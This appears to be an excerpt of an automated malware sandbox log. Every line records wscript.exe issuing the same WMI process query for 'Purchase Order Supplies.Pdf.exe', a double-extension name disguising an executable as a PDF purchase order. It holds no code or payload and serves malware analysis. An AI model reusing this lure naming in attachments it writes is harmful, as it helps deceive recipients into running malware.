              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'Purchase Order Supplies.Pdf.exe'
